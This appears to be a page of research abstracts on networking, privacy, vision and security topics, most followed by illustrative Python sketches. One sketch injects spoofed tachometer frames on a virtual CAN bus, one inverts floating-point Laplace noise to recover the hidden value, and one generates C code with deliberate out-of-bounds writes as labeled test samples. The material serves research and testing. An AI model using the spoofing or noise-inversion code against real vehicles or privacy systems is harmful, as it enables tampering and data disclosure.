
Security function outsourcing has seen both research and deployment in recent years. While most existing services take the straightforward approach of cloud hosting, on-path transit networks (such as ISPs) are increasingly interested in offering outsourced security services to end users. Recent proposals (such as SafeBricks and mbTLS) have made it possible to outsource sensitive security applications to untrusted, arbitrary networks, rendering on-path security function outsourcing more promising than ever. However, one crucial component of on-path security function outsourcing is still missing -- a practical end-to-end network protocol. As a result, the discovery and orchestration of multiple capable and willing transit networks for user-requested security functions have only been assumed in many studies, without any practical solution. In this work, we propose Opsec, an end-to-end security-outsourcing protocol that fills this gap and brings us closer to the vision of on-path security function outsourcing. Opsec automatically discovers one or more transit ISPs between a client and a server and efficiently requests the user-specified security functions. When designing Opsec, we prioritize the practicality and applicability of this new end-to-end protocol in the current Internet. Our proof-of-concept implementation of Opsec for web sessions shows that an end user can start a new web session with a few clicks of a browser plug-in to specify a series of security functions of her choice. We show that it is possible to implement this new end-to-end service model in the current Internet for the majority of web services without any major changes to standard protocols (e.g., TCP, TLS, HTTP) or the existing network infrastructure (e.g., ISPs' routing primitives).
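
To make the orchestration step concrete, here is a minimal Python sketch of how a client-side agent might assign user-requested security functions to capable on-path ISPs. The data structures, discovery step, and greedy assignment policy are illustrative assumptions for exposition, not Opsec's actual message formats or algorithm.

# Hypothetical sketch of a client-side orchestration step; names and
# policy are illustrative, not the Opsec protocol itself.
from dataclasses import dataclass

@dataclass
class TransitISP:
    name: str
    supported_functions: set

def discover_on_path_isps(path):
    """Keep only the on-path hops that advertise outsourcing support."""
    return [hop for hop in path if hop.supported_functions]

def orchestrate(path, requested):
    """Greedily assign each requested security function to the first
    capable ISP along the path (an illustrative policy only)."""
    assignment = {}
    for fn in requested:
        for isp in discover_on_path_isps(path):
            if fn in isp.supported_functions:
                assignment[fn] = isp.name
                break
    return assignment

if __name__ == "__main__":
    path = [TransitISP("ISP-A", {"firewall", "ids"}),
            TransitISP("ISP-B", {"tls-proxy"})]
    print(orchestrate(path, ["ids", "tls-proxy"]))  # {'ids': 'ISP-A', 'tls-proxy': 'ISP-B'}

In a real deployment, discovery would probe the actual client-server path and verify each ISP's advertised capabilities rather than iterating over an in-memory list.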

Related Content

Differential privacy is among the most prominent techniques for preserving the privacy of sensitive data, owing to its robust mathematical guarantees and general applicability to a vast array of computations on data, including statistical analysis and machine learning. Previous work demonstrated that concrete implementations of differential privacy mechanisms are vulnerable to statistical attacks. This vulnerability is caused by the approximation of real values by floating-point numbers: the inverse transform sampling of the Laplace distribution can itself be inverted, enabling an attack in which the original value can be retrieved with non-negligible advantage. This paper presents a practical solution to this finite-precision floating-point vulnerability. The proposed solution has the advantages of being generalisable to any infinitely divisible probability distribution and of being simple to implement on modern architectures. Finally, the solution is designed to make side-channel attacks infeasible, because brute-force attacks against it are inherently exponential in the size of the domain.
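
To illustrate the vulnerability itself (not the proposed mitigation), the Python sketch below performs inverse transform sampling of the Laplace distribution in IEEE-754 floating point and then inverts an observed noisy output back to the uniform draw that produced it; because the transform is a bijection on the finite set of representable values, the noise offers far less protection than the real-valued analysis suggests.

# Demonstration of the finite-precision issue, not the paper's fix.
import math, random

def laplace_inverse_transform(mu, b, u):
    """Standard inverse-CDF Laplace sampler; u is uniform on (-0.5, 0.5)."""
    return mu - b * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

def invert(sample, mu, b):
    """Recover the uniform draw u from an observed noisy sample."""
    x = (sample - mu) / b
    return math.copysign(0.5 * (1.0 - math.exp(-abs(x))), x)

u = random.uniform(-0.5, 0.5)
noisy = laplace_inverse_transform(0.0, 1.0, u)
print(u, invert(noisy, 0.0, 1.0))  # recovered u matches up to rounding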

Weakly supervised temporal action localization aims at learning instance-level action patterns from video-level labels, where a significant challenge is action-context confusion. To overcome this challenge, one recent work builds an action-click supervision framework: it requires similar annotation costs but steadily improves localization performance compared to conventional weakly supervised methods. In this paper, by revealing that the performance bottleneck of existing approaches mainly comes from background errors, we find that a stronger action localizer can be trained with labels on the background video frames rather than on the action frames. To this end, we convert action-click supervision to background-click supervision and develop a novel method, called BackTAL. Specifically, BackTAL implements two-fold modeling on the background video frames, i.e., position modeling and feature modeling. In position modeling, we not only conduct supervised learning on the annotated video frames but also design a score separation module to enlarge the score differences between potential action frames and backgrounds. In feature modeling, we propose an affinity module to measure frame-specific similarities among neighboring frames and dynamically attend to informative neighbors when calculating temporal convolutions. Extensive experiments on three benchmarks demonstrate the high performance of BackTAL and the rationality of the proposed background-click supervision. Code is available at //github.com/VividLe/BackTAL.
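
As a rough illustration of the position-modeling idea, the PyTorch sketch below implements one plausible form of a score-separation objective: it pushes actionness scores on annotated background frames below those of high-confidence action frames by a margin. The hinge form, margin, and top-k frame selection are assumptions for exposition, not BackTAL's exact loss.

# Illustrative score-separation objective; hyperparameters are assumed.
import torch

def score_separation_loss(scores, bg_mask, margin=0.5, top_k=8):
    """scores: (T,) actionness scores in [0, 1] for one video.
    bg_mask: (T,) bool tensor marking background-click frames."""
    bg_scores = scores[bg_mask]
    k = min(top_k, int((~bg_mask).sum()))
    fg_scores = scores[~bg_mask].topk(k)[0]  # likely action frames
    # hinge: mean action score should exceed mean background score by a margin
    return torch.relu(margin - (fg_scores.mean() - bg_scores.mean()))

logits = torch.randn(100, requires_grad=True)
bg_mask = torch.zeros(100, dtype=torch.bool)
bg_mask[::10] = True  # one background click every ten frames
loss = score_separation_loss(torch.sigmoid(logits), bg_mask)
loss.backward()
print(float(loss))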

Cache-coherent non-uniform memory access (ccNUMA) systems enable parallel applications to scale up to thousands of cores and many terabytes of main memory. However, since remote accesses come at an increased cost, extra measures are necessary to scale applications to high core counts and to process far greater amounts of data than a typical server can hold. Much as applications are optimized to improve cache utilization, applications on ccNUMA systems also need to be optimized for data locality to use larger topologies effectively. The first step in optimizing an application is understanding what slows it down, which requires profiling tools or manual instrumentation. When optimizing applications on large ccNUMA systems, however, there are limited mechanisms to capture and present actionable telemetry. This is partially driven by the proprietary nature of such interconnects, but also by the lack of a common and accessible (read: open-source) framework that developers or vendors can leverage. In this paper, we present an open-source, extensible framework that captures high-rate on-chip events with low overhead (<10% single-core utilization). The presented framework can operate in live or record mode, allowing either real-time monitoring or capture for later post-workload or offline analysis. High-resolution visualization is available either through a standards-based (web) interactive graphical interface or through a convenient textual interface for quick-look analysis.
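
The live/record duality can be pictured with the following architectural sketch (not the framework's actual API): a sampling loop polls a pluggable event source at a fixed rate and either streams samples to a real-time consumer or appends them to a trace file for offline analysis. The /proc-based source is a Linux-specific stand-in for real on-chip counters.

# Architectural sketch only; the event source and file format are assumed.
import json, time

def sample_events(source, mode="live", seconds=1.0, hz=100, path="trace.jsonl"):
    sink = open(path, "w") if mode == "record" else None
    try:
        end = time.monotonic() + seconds
        while time.monotonic() < end:
            sample = {"t": time.monotonic(), "events": source()}
            if sink:                 # record mode: persist for later analysis
                sink.write(json.dumps(sample) + "\n")
            else:                    # live mode: hand off to a real-time view
                print(sample)
            time.sleep(1.0 / hz)
    finally:
        if sink:
            sink.close()

def proc_self_cpu():
    """Process CPU times from /proc (Linux-only stand-in for on-chip events)."""
    with open("/proc/self/stat") as f:
        fields = f.read().split()
    return {"utime": int(fields[13]), "stime": int(fields[14])}

sample_events(proc_self_cpu, mode="record", seconds=0.2)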

The Controller Area Network (CAN) is the most common protocol interconnecting the various control units of modern cars. Its vulnerabilities are somewhat known, but we argue they are not yet fully explored -- although the protocol is obviously not secure by design, it remains to be thoroughly assessed how, and to what extent, it can be maliciously exploited. This manuscript describes the early steps towards a larger goal: integrating the various CAN pentesting activities and carrying them out holistically within an established pentesting environment such as the Metasploit Framework. In particular, we show how to build an exploit that upsets a simulated tachometer running on a minimal Linux machine. While both portions are freely available from the authors' GitHub repositories, the exploit is currently the subject of a Metasploit pull request.
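
For a flavor of what such an exploit does on the wire, the hedged Python sketch below injects a spoofed instrument-cluster frame on a virtual CAN bus using the python-can library. The arbitration ID and payload layout are hypothetical; a real target would require the IDs of its own dashboard, and the actual exploit is packaged as a Metasploit module rather than a standalone script.

# Requires: pip install python-can, plus a vcan0 interface on Linux.
import time
import can

def spoof_rpm(bus, rpm, frames=50, period=0.05):
    """Repeatedly inject a frame claiming a fixed engine speed."""
    raw = int(rpm) & 0xFFFF
    msg = can.Message(arbitration_id=0x244,  # hypothetical cluster ID
                      data=[raw >> 8, raw & 0xFF, 0, 0, 0, 0, 0, 0],
                      is_extended_id=False)
    for _ in range(frames):
        bus.send(msg)
        time.sleep(period)  # out-shout the legitimate periodic frame

if __name__ == "__main__":
    with can.interface.Bus(channel="vcan0", bustype="socketcan") as bus:
        spoof_rpm(bus, rpm=8000)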

The increase in popularity of connected features in intelligent transportation systems has led to a greater risk of cyber-attacks and, subsequently, requires more robust validation of cybersecurity in vehicle design. This article explores three such cyber-attacks and the weaknesses in the connected networks they exploit. A review of current vulnerabilities is carried out, and key considerations for future vehicle design and validation are highlighted. This article addresses vehicle manufacturers' desire to add unnecessary remote connections without appropriate security analysis and assessment of the risks involved. The modern vehicle is all connected and only as strong as its weakest link.

A novel combination of two widely used clustering algorithms is proposed here for the detection and reduction of high-data-density regions. The Density-Based Spatial Clustering of Applications with Noise (DBSCAN) algorithm is used to detect high-density regions, and the k-means algorithm to reduce them. The proposed algorithm iterates while successively decrementing the DBSCAN search radius, allowing for an adaptive reduction factor based on the effective data density. The algorithm is demonstrated for a physics simulation application, where a surrogate model for fusion reactor plasma turbulence is generated with neural networks. A training dataset for the surrogate model is created with a quasilinear gyrokinetics code for turbulent transport calculations in fusion plasmas. The training set consists of model inputs derived from a repository of experimental measurements, meaning there is a potential risk of over-representing specific regions of this input parameter space. By applying the proposed reduction algorithm to this dataset, this study demonstrates that the training dataset can be reduced by a factor of ~20 without a noticeable loss in surrogate model accuracy. This reduction provides a novel way of analyzing existing high-dimensional datasets for biases and consequently reducing them, which lowers the cost of re-populating that parameter space with higher-quality data.
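
A minimal sketch of the combined scheme, using scikit-learn's DBSCAN and KMeans, is given below: dense clusters found by DBSCAN are replaced by a smaller set of k-means centroids, and the search radius shrinks on each pass. The radius-decay schedule and per-cluster reduction factor are illustrative choices, not the paper's tuned settings.

# Illustrative parameters; the paper's schedule and factors differ.
import numpy as np
from sklearn.cluster import DBSCAN, KMeans

def reduce_dense_regions(X, eps=0.5, eps_decay=0.7, min_eps=0.05,
                         min_samples=10, keep_fraction=0.2):
    while eps > min_eps:
        labels = DBSCAN(eps=eps, min_samples=min_samples).fit_predict(X)
        kept = [X[labels == -1]]              # sparse (noise) points pass through
        for c in set(labels) - {-1}:
            cluster = X[labels == c]
            k = max(1, int(keep_fraction * len(cluster)))
            km = KMeans(n_clusters=k, n_init=10).fit(cluster)
            kept.append(km.cluster_centers_)  # replace cluster by centroids
        X = np.vstack(kept)
        eps *= eps_decay                      # successively shrink the radius
    return X

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 0.1, (2000, 2)),   # over-represented region
               rng.uniform(-2, 2, (200, 2))])   # sparse background
print(len(X), "->", len(reduce_dense_regions(X)))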

This paper studies the single image super-resolution problem using adder neural networks (AdderNet). Compared with convolutional neural networks, AdderNet uses additions to calculate the output features, thus avoiding the massive energy consumption of conventional multiplications. However, it is very hard to directly transfer the existing success of AdderNet on large-scale image classification to the image super-resolution task due to the different calculation paradigm. Specifically, the adder operation cannot easily learn the identity mapping, which is essential for image processing tasks. In addition, the functionality of high-pass filters cannot be ensured by AdderNet. To this end, we thoroughly analyze the relationship between the adder operation and the identity mapping and insert shortcuts to enhance the performance of SR models using adder networks. We then develop a learnable power activation for adjusting the feature distribution and refining details. Experiments conducted on several benchmark models and datasets demonstrate that our image super-resolution models using AdderNet can achieve performance and visual quality comparable to their CNN baselines, with roughly a 2$\times$ reduction in energy consumption.
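
To make the calculation paradigm concrete, the didactic PyTorch sketch below implements an adder "convolution": each output is the negative L1 distance between an input patch and a filter, so no input-weight multiplications are needed. This dense, unoptimized version is for illustration only, not the paper's implementation.

# Didactic adder layer; real AdderNet uses an optimized kernel.
import torch
import torch.nn.functional as F

def adder2d(x, weight, stride=1, padding=0):
    """x: (N, Cin, H, W); weight: (Cout, Cin, K, K)."""
    n, cin, h, w = x.shape
    cout, _, k, _ = weight.shape
    patches = F.unfold(x, k, stride=stride, padding=padding)  # (N, Cin*K*K, L)
    wflat = weight.view(cout, -1)                             # (Cout, Cin*K*K)
    # negative L1 distance between every patch and every filter
    out = -(patches.unsqueeze(1) - wflat.unsqueeze(0).unsqueeze(-1)).abs().sum(2)
    hout = (h + 2 * padding - k) // stride + 1
    return out.view(n, cout, hout, -1)

x = torch.randn(1, 3, 8, 8)
w = torch.randn(4, 3, 3, 3)
print(adder2d(x, w, padding=1).shape)  # torch.Size([1, 4, 8, 8])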

In this paper, we present a comprehensive review of the imbalance problems in object detection. To analyze the problems in a systematic manner, we introduce a problem-based taxonomy. Following this taxonomy, we discuss each problem in depth and present a unifying yet critical perspective on the solutions in the literature. In addition, we identify major open issues regarding the existing imbalance problems, as well as imbalance problems that have not been discussed before. Moreover, to keep our review up to date, we provide an accompanying webpage that catalogs papers addressing imbalance problems according to our problem-based taxonomy. Researchers can track newer studies on this webpage, available at //github.com/kemaloksuz/ObjectDetectionImbalance.

Driven by the visions of the Internet of Things and 5G communications, edge computing systems integrate computing, storage, and network resources at the edge of the network to provide computing infrastructure, enabling developers to quickly develop and deploy edge applications. Edge computing systems have now received widespread attention in both industry and academia. To explore new research opportunities and assist users in selecting suitable edge computing systems for specific applications, this survey paper provides a comprehensive overview of existing edge computing systems and introduces representative projects. A comparison of open-source tools is presented according to their applicability. Finally, we highlight energy efficiency and deep learning optimization of edge computing systems. Open issues in analyzing and designing an edge computing system are also studied in this survey.

In this study, we investigate the limits of the current state-of-the-art AI system for detecting buffer overflows and compare it with current static analysis tools. To do so, we developed a code generator, s-bAbI, capable of producing an arbitrarily large number of code samples of controlled complexity. We found that the static analysis engines we examined have good precision but poor recall on this dataset, except for a sound static analyzer that has both good precision and good recall. We found that the state-of-the-art AI system, a memory network modeled after Choi et al. [1], can achieve performance similar to that of the static analysis engines, but requires an exhaustive amount of training data to do so. Our work points towards future approaches that may solve these problems: namely, using representations of code that can capture appropriate scope information and using deep learning methods that are able to perform arithmetic operations.
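
As a toy illustration of what such a generator produces (the actual s-bAbI grammar and complexity controls differ), the Python sketch below emits small labeled C functions in which a fixed-size stack buffer is written either in or out of bounds.

# Toy generator in the spirit of s-bAbI; templates are illustrative.
import random

TEMPLATE = """void fn_{i}(void) {{
    char buf[{size}];
    int idx = {idx};
    buf[idx] = 'A';{label}
}}
"""

def generate_sample(i, max_size=64):
    size = random.randint(2, max_size)
    unsafe = random.random() < 0.5
    idx = (random.randint(size, size + 8) if unsafe
           else random.randint(0, size - 1))
    label = "  /* UNSAFE: out-of-bounds write */" if unsafe else "  /* SAFE */"
    return TEMPLATE.format(i=i, size=size, idx=idx, label=label), unsafe

for i in range(3):
    code, is_unsafe = generate_sample(i)
    print(code)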
